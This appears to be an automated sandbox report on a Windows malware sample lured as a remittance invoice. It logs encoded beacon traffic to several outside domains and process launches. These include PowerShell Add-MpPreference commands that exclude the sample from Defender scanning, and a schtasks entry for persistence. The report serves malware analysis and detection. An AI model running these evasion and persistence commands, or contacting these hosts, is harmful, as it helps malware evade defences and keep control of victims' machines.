                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: ed4c0c90894d435a51af89e5da323a7d
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}
                                          May 27, 2024 12:45:35.064750910 CEST | 778 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:34 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=bcbe3615-9638-4f2073ab54bf092b4c9640a9033580cdd6b3; Expires=1716813933; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067345403663e11ca6cd7bbc4f64e8583e0e61441c4defe63;path=/;HttpOnly;Max-Age=1800
                                          jckl: QliM1ONpibm7gGLxB3FwJjMauN9Vjgke/D+Ap4DM8X5aIsApOJ26c6xXv3ksnnFATCOfXe72BIMCEAhmADgwAQ==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: ed4c0c90894d435a51af89e5da323a7d
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          44 | 192.168.2.5 | 49759 | 65.181.132.158 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:36.194500923 CEST | 500 | OUT | GET /viqu/?4b34ht=MVCyVDN3RwNEbgSUD+0xRye29v/XSHfdB7daKMb285I6uLH+in3mV6SqMrakijFPfITBXvDDRnIloAD3dOOGlBaUMS2RVppA4PBahCfW4PrIZhDLLp/ysGvZxQcLTJd5vQ==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:37.161252975 CEST | 778 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:37 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=69170616-5a80-4a85e43286fad706fc118ba3be2eb3943567; Expires=1716813936; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067369424574e08b58b48d9360f0670871980b948440a89de;path=/;HttpOnly;Max-Age=1800
                                          jckl: jp473CFF18LrLXLAJZvi60n2+QwijBWbj7QIvsby8AR6omWOkhMrI+J23mO1yU45lIzpEr7aDL3IotB2wbveAQ==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: aecfe4de7c23571dace5267a98fc8aae
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          45 | 192.168.2.5 | 49760 | 3.33.130.190 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:42.231117964 CEST | 783 | OUT | POST /vtm3/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Origin: http://www.retrorocketmodels.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.retrorocketmodels.com/vtm3/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=pTTlmI7zJnWlKFW8PNaNgpkA6FynlYobK+czcMm7xGhpPQwyhcNUZ28yi5bitVrBeqxnIT2kTt1PeT5LH1bPeF4FA/ujKmIv7hmmf4aA8mPWBOxADm1lTwPhebpILWbik/zxa7omIFDoBFgsgFZNTFeji8vd4YwUh0jOvP1irKmGrkHalCgFCsLwCNOknr/qsy1aWvY=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          46 | 192.168.2.5 | 49761 | 3.33.130.190 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:44.901004076 CEST | 803 | OUT | POST /vtm3/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Origin: http://www.retrorocketmodels.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.retrorocketmodels.com/vtm3/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=pTTlmI7zJnWlLmO8NuyN1ZkH3Vyns4ofK+AzcMOrw01pIwAygelUe28yqZb+j1qPeqNFIWekTthPeSJLHiHIcV4HIfulX2Iv7hmmf4O68mnWB+hABH1mQwPmKLpIZmbmk/zTa60AIHLoBEwsg0ZKGVe5tcu1wNtOnE71yv008r+MqSqw/gotRMnISeGT2beD2RlqI4PWYEwQaAUt/kvtoP/xdjOQ


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          47 | 192.168.2.5 | 49762 | 3.33.130.190 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:47.438002110 CEST | 1820 | OUT | POST /vtm3/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Origin: http://www.retrorocketmodels.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.retrorocketmodels.com/vtm3/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht= [TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          48 | 192.168.2.5 | 49763 | 3.33.130.190 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:49.969013929 CEST | 512 | OUT | GET /vtm3/?4b34ht=kR7Fl86BSFGGM0PlM+jb3Z8U1XiTwr46KttiVv2q+FBEIB4NiNNJYHhFj5b5v2TtaYgnHWWiT/h6cxdEcVnMTV8uD5XBSlgGjz30dZ+o/GujFcx5HUknEw/XEJ5xYkmM6w==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:50.435273886 CEST | 413 | IN | HTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:45:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 273
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4b34ht=kR7Fl86BSFGGM0PlM+jb3Z8U1XiTwr46KttiVv2q+FBEIB4NiNNJYHhFj5b5v2TtaYgnHWWiT/h6cxdEcVnMTV8uD5XBSlgGjz30dZ+o/GujFcx5HUknEw/XEJ5xYkmM6w==&UxF=2Nflznk0WJ3hjv"}</script></head></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          49 | 192.168.2.5 | 49764 | 51.195.44.77 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:55.639969110 CEST | 756 | OUT | POST /1jr4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Origin: http://www.adylkerak.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.adylkerak.ru/1jr4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=pE192Wc64evJvH9TQ2nL8CdRf7U+Ss+wmbinRe2FvwUSxsQDErKlMLCcOp/Ila+/eTyoyT06/WNlqbJU0ZkW0h+vH15g5S+FvxN6A6fbIAZQvyv7bvGbQ6pIzFy87ByeiwjjqiAS0+PfnejFUVST7qQJ2ERsyKYXAgFxIBhSv7h8gBVVzVLY8vvAGKZA7BwfHwZ4Uow=
                                          May 27, 2024 12:45:56.274019957 CEST | 197 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:56 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          50 | 192.168.2.5 | 49765 | 51.195.44.77 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:58.172692060 CEST | 776 | OUT | POST /1jr4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Origin: http://www.adylkerak.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.adylkerak.ru/1jr4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=pE192Wc64evJvntTWnnL6idSTbU+YM+KmbunRfzIvl8SxOYDFvmlFbCcFJ/H4K+heT/fyRg6/XplqetU1uQV3R+tNl5Y0y+FvxN6A+3xIDpQvDf7K9uYYapHjVy8/ByaiwjdqnY804Dfnc7FVAuQ1qQLrUQE37YTFiJEJnQI4NpGh34/p3DwvPD4WZR3qxR2dTJIK/m0Ypz7MGbfs+Ei2WbO/JVK
                                          May 27, 2024 12:45:58.789990902 CEST | 197 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:58 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          51 | 192.168.2.5 | 49766 | 51.195.44.77 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:46:00.708856106 CEST | 1793 | OUT | POST /1jr4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Origin: http://www.adylkerak.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.adylkerak.ru/1jr4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=pE192Wc64evJvntTWnnL6idSTbU+YM+KmbunRfzIvjkSw9ADHIylfbCcGJ/E4K/9eTnTyR8q/Vhlr4hU86MVgh+tD15j5S+Mvxd+A6TxIDpQvAH7KvGYeapIzFy47BzHi02mqjFJ0Ijfm8rFXyGQqaQFoUQc3+BNFiV+JjYm4KlGhGBOsGvg8tj1EOZM+WYbRyhjCfyORoHMazvD49V73DbK/dkkOFytsEhMOh7oq0svTRw60exib6B8yIUMEOqmhU5mdCmfQ68idsPjf9JsUBqsF47gChoMzO9ClAUzCx6bGtRGu8TFUakXcoMbVAHbSrica/yVilOE8yKczlU8EfErTKI3GvUEHQ62ypbmw9zabRNYZ60Wdopy/qrbdg5YtsCdnRvSxnJFjOojW9cDWxqyfbSwgkCVhW9HKCV/pC5+EdUpUvj7zcx9HzsBS2VQq41p28JM59OkZ0aK0LQVsA/81LMqiWtAEs21MUx78eZJOWOS3AZPgL+Zt94WS7k7Ta0O/Oo5B91Ih2DknuSbZ+dsDLjG7nD4dZ1Atbv3nPnjbRzk4egT+UAtwsIxWpqd+8jTqQFd5+8Nw+7Sm7kaNse3hOwTbJjgx5w+ouCNW4lqzGTBqFob+BsZwqJ0n3tGwrSPLpqexX0A1G6KzBBASinkQL2zOUwZu0PL3NJ7hIG0rbPUKQZ5p0leI/WzFIq7IlYho6bMwkl5ng3czEux0OoT+L3viL76ZF7CxzFz42CCjxEpBiw4CT2Hb4D0IMUXP2ficmYrzqrKYDMhY7GbNLikRIljcx+Dcn7rKxei531jlO3phNcix/RMi9ah93pUFCmuDemcMkwBcMK0zd2MVxlVNbfHRaBOVimNjmTXgDBMYD2OWyu69E0fXDYahHpzrqYxcOn+PLCqHNlL4nWBXYQZJc7qJ6/YkNAkkYT+NiTcxDRhLmY9uXgthtbWDJg8DODV3nSCNQcQ0ks/EEtV9Z0WcBCMmlUSqRGynnyi5BOzv [TRUNCATED]
                                          May 27, 2024 12:46:01.379152060 CEST | 197 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:46:01 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          52 | 192.168.2.5 | 49767 | 51.195.44.77 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:46:03.256364107 CEST | 503 | OUT | GET /1jr4/?4b34ht=kGdd1iddr+mvgzlLI3SGjgxAabUOGsKw2bG4JPXV9hwIwsQyE7CLPYW2F+PDsbjHTDHawkku/URFrqQj7JM/kB2xKVcJ0yqZ4Q9OBe3AFA9XjQjtHcn6JNxir1+KynzC3w==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:46:03.895646095 CEST | 197 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:46:03 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          53 | 192.168.2.5 | 49768 | 217.70.184.50 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:46:09.061804056 CEST | 756 | OUT | POST /fr5e/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.tranivel.com
                                          Origin: http://www.tranivel.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.tranivel.com/fr5e/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=z9mt9rsc6/c/HYS4qmbuPd9nVdHb2KE4fQ2z9LbcmCm6RxJkdC9jQP7bJg+xx4YdbjOl1zBrtqd3O9keGJp0g/RmAaer5KXxExG6RKIpT3nFMANzSzW15GnQBk2TdiKzqWTg9wPeJYmmhQ1yyQtxwK3KxjESO4HEK6CD5DGINytBf8n4VyVIvTXhCY0qU6mbVdbaMW8=
                                          May 27, 2024 12:46:09.692454100 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:46:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          54 | 192.168.2.5 | 49769 | 217.70.184.50 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:46:11.596506119 CEST | 776 | OUT | POST /fr5e/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.tranivel.com
                                          Origin: http://www.tranivel.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.tranivel.com/fr5e/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=z9mt9rsc6/c/BJi463bueN9kMtHb/qE8fQ6z9J3MzgS6fw5keD9jTP7bCA/7/YZwbjSb1y9rtq53O/8eG6B3gvRkUqet3qXxExG6RLsTT0XFMwdzUQO2imnRJE2TOyKJqWTJ9xT4JeimhRFyzBt2l63I+DFVCbi4A63I0wT6eB1ZXqKSPQdg8z7ZSL8dFKHyP+LqSBpGWKf1R4w6lmvnBdXrwNC+
                                          May 27, 2024 12:46:12.196279049 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:46:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                          Session ID:55
                                          Source IP:192.168.2.5
                                          Source Port:49770
                                          Destination IP:217.70.184.50
                                          Destination Port:80

                                          Timestamp:May 27, 2024 12:46:14.564163923 CEST
                                          Bytes transferred:1793
                                          Direction:OUT
                                          Data:
                                          POST /fr5e/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.tranivel.com
                                          Origin: http://www.tranivel.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.tranivel.com/fr5e/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Timestamp:May 27, 2024 12:46:15.179610014 CEST
                                          Bytes transferred:608
                                          Direction:IN
                                          Data:
                                          HTTP/1.1 501 Unsupported method ('POST')
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:46:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                          Target ID:0
                                          Start time:06:42:06
                                          Start date:27/05/2024
                                          Path:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
                                          Imagebase:0x400000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:06:42:07
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
                                          Imagebase:0xc30000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:06:42:07
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
                                          Imagebase:0xc30000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"
                                          Imagebase:0x210000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
